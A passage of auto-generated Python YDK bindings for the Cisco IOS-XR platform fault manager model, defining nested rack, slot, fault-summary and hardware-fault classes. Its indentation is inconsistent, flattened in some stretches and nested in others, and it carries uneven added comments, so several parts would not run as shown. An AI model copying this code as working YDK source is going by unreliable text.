    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices, leaf_names, name, value)
class HardwareFaultDevice(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_device (key)
hw fault device list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: hardware_fault_type
Table of Hardware Failure Type
**type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up a 'hardware-fault-device' list entry keyed by hw_fault_device and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()
    self.yang_name = "hardware-fault-device"
    self.yang_parent_name = "hardware-fault-devices"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['hw_fault_device']
    self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
    self._leafs = OrderedDict([
        ('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
    ])
    self.hw_fault_device = None  # list key leaf
    self.hardware_fault_type = YList(self)  # keyed list of HardwareFaultType entries
    # Segment path embeds the key value; evaluated lazily via lambda.
    self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes (key leaf included) through the YDK setter."""
    keyed_leafs = ['hw_fault_device']
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, keyed_leafs, name, value)
class HardwareFaultType(_Entity_):
    """
    Table of Hardware Failure Type
    .. attribute:: hw_fault_type (key)
    hw fault type list
    **type**\: str
    **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
    **config**\: False
    .. attribute:: condition_description
    Faulty Hardware Condition Description
    **type**\: str
    **config**\: False
    .. attribute:: condition_name
    Faulty Hardware Condition Name
    **type**\: str
    **config**\: False
    .. attribute:: device_key
    Faulty Hardware Device Key
    **type**\: str
    **config**\: False
    .. attribute:: device_version
    Faulty Hardware Device Version
    **type**\: int
    **range:** \-2147483648..2147483647
    **config**\: False
    .. attribute:: condition_raised_timestamp
    Fault Raised Timestamp
    **type**\: str
    **config**\: False
    .. attribute:: process_id
    Faulty Hardware Process ID
    **type**\: int
    **range:** \-2147483648..2147483647
    **config**\: False
    .. attribute:: device_description
    Faulty Hardware Device Description
    **type**\: str
    **config**\: False
    .. attribute:: condition_severity
    Faulty Hardware Condition Severity
    **type**\: str
    **config**\: False
    """
    _prefix = 'pfm-oper'
    _revision = '2017-03-28'
    def __init__(self):
        """Set up a 'hardware-fault-type' list entry keyed by hw_fault_type and freeze."""
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()
        self.yang_name = "hardware-fault-type"
        self.yang_parent_name = "hardware-fault-device"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['hw_fault_type']
        self._child_classes = OrderedDict([])  # leaf-only list entry, no children
        self._leafs = OrderedDict([
            ('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
            ('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
            ('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
            ('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
            ('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
            ('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
            ('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
            ('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
            ('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
        ])
        self.hw_fault_type = None  # list key leaf
        self.condition_description = None
        self.condition_name = None
        self.device_key = None
        self.device_version = None
        self.condition_raised_timestamp = None
        self.process_id = None
        self.device_description = None
        self.condition_severity = None
        # Segment path embeds the key value; evaluated lazily via lambda.
        self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
        # Freeze last: all assignments above must precede this flag.
        self._is_frozen = True
    def __setattr__(self, name, value):
        """Route attribute writes through the YDK frozen-entity setter."""
        self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)
    @staticmethod
    def _meta_info():
        """Return the generated meta-info record for this class."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
        return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for HardwareFaultDevice."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for HardwareFaultDevices."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for Slot."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for Slots."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for Rack."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for Racks."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for FaultType3."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for FaultType3s."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s']
    return entry['meta_info']
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'racks' list container under fault-type2 (YList of Rack entries) and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks, self).__init__()
    self.yang_name = "racks"
    self.yang_parent_name = "fault-type2"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack))])
    self._leafs = OrderedDict()
    self.rack = YList(self)  # keyed list of Rack entries
    self._segment_path = lambda: "racks"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks, leaf_names, name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up a 'rack' list entry keyed by the uint32 rack number and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack, self).__init__()
    self.yang_name = "rack"
    self.yang_parent_name = "racks"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['rack']
    self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots))])
    self._leafs = OrderedDict([
        ('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
    ])
    self.rack = None  # list key leaf (rack number)
    self.slots = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots()
    self.slots.parent = self
    self._children_name_map["slots"] = "slots"
    # Segment path embeds the key value; evaluated lazily via lambda.
    self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes (key leaf included) through the YDK setter."""
    keyed_leafs = ['rack']
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack, keyed_leafs, name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'slots' list container (YList of Slot entries) and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots, self).__init__()
    self.yang_name = "slots"
    self.yang_parent_name = "rack"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot))])
    self._leafs = OrderedDict()
    self.slot = YList(self)  # keyed list of Slot entries
    self._segment_path = lambda: "slots"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots, leaf_names, name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_summary
Table of Hardware Summary
**type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary>`
**config**\: False
.. attribute:: hardware_fault_devices
Table of Hardware Failure
**type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.fault_summary = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary()
self.fault_summary.parent = self
self._children_name_map["fault_summary"] = "fault-summary"
self.hardware_fault_devices = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices()
self.hardware_fault_devices.parent = self
self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot, ['slot'], name, value)
class FaultSummary(_Entity_):
"""
Table of Hardware Summary
.. attribute:: severity_critical_count
Fault Severity Critical count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_emergency_or_alert_count
Fault Severity Emergency count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: total
Faulty Hardware total count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_error_count
Fault Severity Error count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()
self.yang_name = "fault-summary"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
('total', (YLeaf(YType.int32, 'total'), ['int'])),
('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
])
self.severity_critical_count = None
self.severity_emergency_or_alert_count = None
self.total = None
self.severity_error_count = None
self._segment_path = lambda: "fault-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']
class HardwareFaultDevices(_Entity_):
"""
Table of Hardware Failure
.. attribute:: hardware_fault_device
Table of Hardware Failure Device
**type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()
self.yang_name = "hardware-fault-devices"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
self._leafs = OrderedDict()
self.hardware_fault_device = YList(self)
self._segment_path = lambda: "hardware-fault-devices"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices, [], name, value)
class HardwareFaultDevice(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_device (key)
hw fault device list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: hardware_fault_type
Table of Hardware Failure Type
**type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()
self.yang_name = "hardware-fault-device"
self.yang_parent_name = "hardware-fault-devices"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_device']
self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
self._leafs = OrderedDict([
('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
])
self.hw_fault_device = None
self.hardware_fault_type = YList(self)
self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, ['hw_fault_device'], name, value)
class HardwareFaultType(_Entity_):
"""
Table of Hardware Failure Type
.. attribute:: hw_fault_type (key)
hw fault type list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: condition_description
Faulty Hardware Condition Description
**type**\: str
**config**\: False
.. attribute:: condition_name
Faulty Hardware Condition Name
**type**\: str
**config**\: False
.. attribute:: device_key
Faulty Hardware Device Key
**type**\: str
**config**\: False
.. attribute:: device_version
Faulty Hardware Device Version
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: condition_raised_timestamp
Fault Raised Timestamp
**type**\: str
**config**\: False
.. attribute:: process_id
Faulty Hardware Process ID
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: device_description
Faulty Hardware Device Description
**type**\: str
**config**\: False
.. attribute:: condition_severity
Faulty Hardware Condition Severity
**type**\: str
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()
self.yang_name = "hardware-fault-type"
self.yang_parent_name = "hardware-fault-device"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
])
self.hw_fault_type = None
self.condition_description = None
self.condition_name = None
self.device_key = None
self.device_version = None
self.condition_raised_timestamp = None
self.process_id = None
self.device_description = None
self.condition_severity = None
self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
    """Fetch the generated meta entry for the Rack binding class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Fetch the generated meta entry for the Racks binding class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Fetch the generated meta entry for the FaultType2 binding class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Fetch the generated meta entry for the FaultType2s binding class."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
    entry = meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s']
    return entry['meta_info']
class Racks(_Entity_):
    """
    Table of racks

    .. attribute:: rack

        Number

        **type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack>`

        **config**\: False

    """

    # NOTE: auto-generated YDK binding class; structure mirrors the YANG model.
    _prefix = 'pfm-oper'
    _revision = '2017-03-28'

    def __init__(self):
        # Python-2/3 compatible super() call emitted by the generator.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks, self).__init__()

        self.yang_name = "racks"
        self.yang_parent_name = "fault-type1"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Maps YANG child node name -> (python attribute name, binding class).
        self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack))])
        self._leafs = OrderedDict()

        self.rack = YList(self)
        self._segment_path = lambda: "racks"
        # Must be assigned last: once frozen, writes go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegates to the entity machinery; empty list = no key leafs on this node.
        self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks, [], name, value)


    class Rack(_Entity_):
        """
        Number

        .. attribute:: rack  (key)

            Rack number

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        .. attribute:: slots

            Table of slots

            **type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots>`

            **config**\: False

        """

        _prefix = 'pfm-oper'
        _revision = '2017-03-28'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack, self).__init__()

            self.yang_name = "rack"
            self.yang_parent_name = "racks"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # 'rack' is the YANG list key for this entry.
            self.ylist_key_names = ['rack']
            self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots))])
            self._leafs = OrderedDict([
                ('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
            ])
            self.rack = None

            # Child container is instantiated eagerly and parented to self.
            self.slots = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots()
            self.slots.parent = self
            self._children_name_map["slots"] = "slots"

            # Segment path embeds the key value; evaluated lazily so it reflects
            # the current value of self.rack.
            self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack, ['rack'], name, value)


        class Slots(_Entity_):
            """
            Table of slots

            .. attribute:: slot

                Name

                **type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot>`

                **config**\: False

            """

            _prefix = 'pfm-oper'
            _revision = '2017-03-28'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots, self).__init__()

                self.yang_name = "slots"
                self.yang_parent_name = "rack"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
